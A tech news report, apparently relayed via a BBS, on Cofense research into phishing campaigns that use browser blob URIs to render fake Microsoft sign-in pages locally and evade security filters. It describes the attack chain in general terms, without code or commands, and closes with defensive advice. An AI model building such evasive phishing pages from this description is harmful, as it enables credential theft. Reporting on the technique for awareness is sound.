Cybercriminals have found a sneaky way of stealing tax accounts and even encrypted messages: here's what you need to know

Date:
Sat, 10 May 2025 21:33:00 +0000

Description:
A new phishing tactic loads fake login screens using blob URIs, letting attackers steal credentials without detection by firewalls, SEG tools, or AI filters.

FULL STORY ======================================================================Bypasses
email gateways and security tools by never hitting a real server Blob URIs mean phishing content isnt hosted online, so filters never see it coming No weird URLs, no dodgy domains, just silent theft from a fake Microsoft login page

Security researchers have uncovered a series of phishing campaigns that use a rarely exploited technique to steal login credentials, even when those credentials are protected by encryption.

New research from Cofense warns the method relies on blob URIs, a browser feature designed to display temporary local content, and cybercriminals are now abusing this feature to deliver phishing pages.

Blob URIs are created and accessed entirely within a user's browser, meaning the phishing content never exists on a public-facing server. This makes it extremely difficult for even the most advanced endpoint protection systems to detect. A hidden technique that slips past defenses

In these campaigns, the phishing process begins with an email that easily bypasses Secure Email Gateways (SEGs). These emails typically contain a link to what appears to be a legitimate page, often hosted on trusted domains such as Microsofts OneDrive.

However, this initial page doesnt host the phishing content directly.
Instead, it acts as an intermediary, silently loading a threat-actor-controlled HTML file that decodes into a blob URI.

The result is a fake login page rendered within the victims browser, designed to closely mimic Microsofts sign-in portal.

To the victim, nothing seems out of place - no strange URLs or obvious signs of fraud - just a prompt to log in to view a secure message or access a document. Once they click Sign in, the page redirects to another attacker-controlled HTML file, which generates a local blob URI that displays the spoofed login page.

Because blob URIs operate entirely within the browsers memory and are inaccessible from outside the session, traditional security tools are unable to scan or block the content.

This method makes detection and analysis especially tricky, said Jacob Malimban of the Cofense Intelligence Team.

The phishing page is created and rendered locally using a blob URI. Its not hosted online, so it cant be scanned or blocked in the usual way.

Credentials entered on the spoofed page are silently exfiltrated to a remote threat actor endpoint, leaving the victim unaware.

AI-based security filters also struggle to catch these attacks, as blob URIs are rarely used maliciously and may not be well-represented in training data. Researchers warn that unless detection methods evolve, this technique is likely to gain traction among attackers.

To defend against such threats, organizations are urged to adopt advanced Firewall-as-a-Service ( FWAAS ) and Zero Trust Network Access ( ZTNA ) solutions that can help secure access and flag suspicious login activity. You might also like These are the best business laptops available to buy right
now And you should take a look at the best office chairs we've tried Ransomware hackers target a new Windows security flaw to hit businesses



======================================================================
Link to news story: https://www.techradar.com/pro/cybercriminals-have-found-a-sneaky-way-of-steali ng-tax-accounts-and-even-encrypted-messages-heres-what-you-need-to-know


--- Mystic BBS v1.12 A47 (Linux/64)
* Origin: tqwNet Technology News (1337:1/100)